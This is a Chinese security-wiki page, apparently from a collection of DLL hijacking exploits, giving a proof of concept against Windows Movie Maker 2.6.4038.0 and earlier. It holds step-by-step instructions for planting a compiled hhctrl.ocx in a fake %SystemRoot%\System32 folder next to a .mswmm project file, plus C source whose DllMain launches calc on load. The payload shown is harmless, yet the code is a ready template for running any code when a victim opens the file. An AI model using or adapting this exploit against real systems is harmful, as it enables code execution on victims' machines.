习科小黑板 - Silic Wiki

用户工具

站点工具

您的足迹: win_movie_maker_2.6.4038.0

侧边栏

Silic Wiki

习科旧站

干货分享

网络安全

工具分享

路子很野


技术自由 技术创新 技术共享
技术原创 技术进步

dll_劫持代码:win_movie_maker_2.6.4038.0

Win Movie Maker<=2.6.4038.0

所属类别 hhctrl.ocx

hhctrl.c
/*
There is a way more interesting bug there in which the program tries to load a driver file.
It's in investigation, but has a nice potential for a nastier vulnerability.
1. Create a file with the following extension: .mswmm
2. Compile this library and rename it to hhctrl.ocx
3. On the same directory of the .mswmm file, create a directory called: %SystemRoot%
4. Inside %SystemRoot%, create a directory called: System32
5. Move hhctrl.ocx into the System32 directory that you have just created
6. Open the .mswmm file and enjoy the fireworks
*/
#include 
#define DLLIMPORT __declspec (dllexport)
int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  evil();
  return 0;
}
你需要登录发表评论。
dll_劫持代码/win_movie_maker_2.6.4038.0.txt · 最后更改: 2020/05/16 19:19 (外部编辑)

页面工具

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki